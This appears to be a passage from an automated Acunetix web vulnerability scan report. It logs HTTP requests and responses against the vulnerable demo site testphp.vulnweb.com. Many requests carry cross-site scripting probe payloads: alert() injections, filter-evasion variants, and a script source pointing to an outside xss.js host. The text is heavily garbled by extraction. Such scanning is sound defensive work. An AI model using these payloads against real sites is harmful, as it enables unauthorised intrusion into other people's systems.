[email protected][email protected]&uphone=111-222-1933email@ad [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Acunetix Website Audit

181

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 314 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=&ucc=111-222-1933email@ [email protected][email protected]&ua [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 311 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=&ucc=111-222-1933email@add [email protected][email protected]&uaddr [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Acunetix Website Audit

182

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 347 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=[email protected][email protected]&uphon Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 400 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=&ucc=111-222-1933email@ad [email protected][email protected]&uadd [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Acunetix Website Audit

183

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 378 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected]&urname=[email protected]&uemail=111-2 [email protected][email protected]&uaddress=111-222-1933emai Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=&upass=111-222-1933email@ad [email protected][email protected]&ucc= [email protected][email protected]&uphone=111-222-1933em [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Acunetix Website Audit

184

Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=-->alert(519485953406)%3B&upass=111-222-1933email@addre [email protected][email protected]&ucc=111 [email protected][email protected]&uphone=111-222-1933emai Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 400 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=[email protected]&upass2=111 [email protected][email protected]&ucc=111-222-1933email@ad [email protected][email protected]&uadd [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Acunetix Website Audit

185

Host: testphp.vulnweb.com Content-Length: 342 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28520075953657%29%3B%22%3E&upass=111-222-19 [email protected][email protected]&urname=111-222-1933email@addres [email protected][email protected]&uphone=111Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 356 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=&up [email protected][email protected]&urname=111-222-19 [email protected][email protected][email protected] [email protected][email protected]&signup=si gnup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 326 Acunetix Website Audit

186

Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=alert(519435953405)%3B&upass=111-222-1933email@address. [email protected][email protected]&ucc=111-22 [email protected][email protected]&uphone=111-222-1933email@a Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 338 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=%3C/xss/*-*/style=xss:e/**/xpression(alert(521325954312))%3E&upass=111-222-1933em [email protected][email protected][email protected] [email protected][email protected][email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 314 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

187

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=[email protected]&upass2=1 [email protected][email protected]&ucc=111-222-1933email@ [email protected][email protected]&u Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 320 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=<%00script>alert(520035953657)%3B[email protected]&up [email protected][email protected]&ucc=111-222-1933 [email protected][email protected]&uphone=111-222-1933email@address. [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 324 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=[email protected] Acunetix Website Audit

188

[email protected][email protected]&ucc=111-222 [email protected][email protected]&uphone=111-222-1933email@ad Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=>'>alert(519445953405)%3B&upass=111-222-1933email@addre [email protected][email protected]&ucc=111 [email protected][email protected]&uphone=111-222-1933email @[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 349 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28519515953406%29%3B%22%3E&upass=111 [email protected][email protected]&urname=111-222-1933email @[email protected][email protected]&upho [email protected][email protected]&signup=signup Acunetix Website Audit

189

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 351 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=&upass=1 [email protected][email protected]&urname=111-222-1933ema [email protected][email protected][email protected]&up [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 350 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=&upass=11 [email protected][email protected]&urname=111-222-1933emai [email protected][email protected][email protected]&uph [email protected][email protected]&signup=signup Response Acunetix Website Audit

190

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 346 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=email@somealert(519495953406)%3Bdomain.com&upass=111-22 [email protected][email protected]&urname=111-222-1933email@ad [email protected][email protected]&uphone= [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=>">alert(519455953405)%3B&upass=111-222-1933email@addre [email protected][email protected]&ucc=111 [email protected][email protected]&uphone=111-222-1933email @[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Acunetix Website Audit

191

Content-Type: text/html Connection: close /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 334 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=alert(519475953406)%3B&upass=111-222-1933email@ [email protected][email protected]&uc [email protected][email protected]&uphone=111-222-1933 [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 337 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=alert(519465953406)%3B&upass=111-222-1933ema [email protected][email protected][email protected] [email protected][email protected]&uphone=111-222-1 [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

192

/secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 357 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname="+src="http://testphp.acunetix.com/xss.js?520685953986">&u [email protected][email protected]&urname=111-222-1 [email protected][email protected]&uemail=111-222-1933email@address. [email protected][email protected]&signup=s ignup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 378 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=[email protected]&upass2=111-222-1933email@address [email protected][email protected]&uemail=111-2 [email protected][email protected]&uaddress=111-222-1933email @address.tst&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

193

/secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 347 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=&upass=111-2 [email protected][email protected]&urname=111-222-1933email@a [email protected][email protected]&uphone [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 311 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=[email protected][email protected][email protected]&ucc=111-222-1933email@add [email protected][email protected]&uaddr [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

194

/secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=%00"'>alert(520735953986)%3B&upass=111-222-1933email@ad [email protected][email protected]&ucc= [email protected][email protected]&uphone=111-222-1933em [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 367 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=[email protected][email protected]&urname [email protected][email protected]&uemail=111-222-1933emai [email protected][email protected][email protected] t&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

195

/secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=alert(520705953986)%3B&upass=111-222-1933email@ad [email protected][email protected]&ucc= [email protected][email protected]&uphone=111-222-1933em [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm uuname=%00'">alert(520725953986)%3B&upass=111-222-1933email@ad [email protected][email protected]&ucc= [email protected][email protected]&uphone=111-222-1933em [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Acunetix Website Audit

196

Request GET /showimage.php?file=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28497955938426%29%3B%22%3E&siz e=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

Request GET /showimage.php?file=&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details Request GET /showimage.php?file=&size=160 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit

197

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:11 GMT Content-Type: image/jpeg Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /showimage.php Details

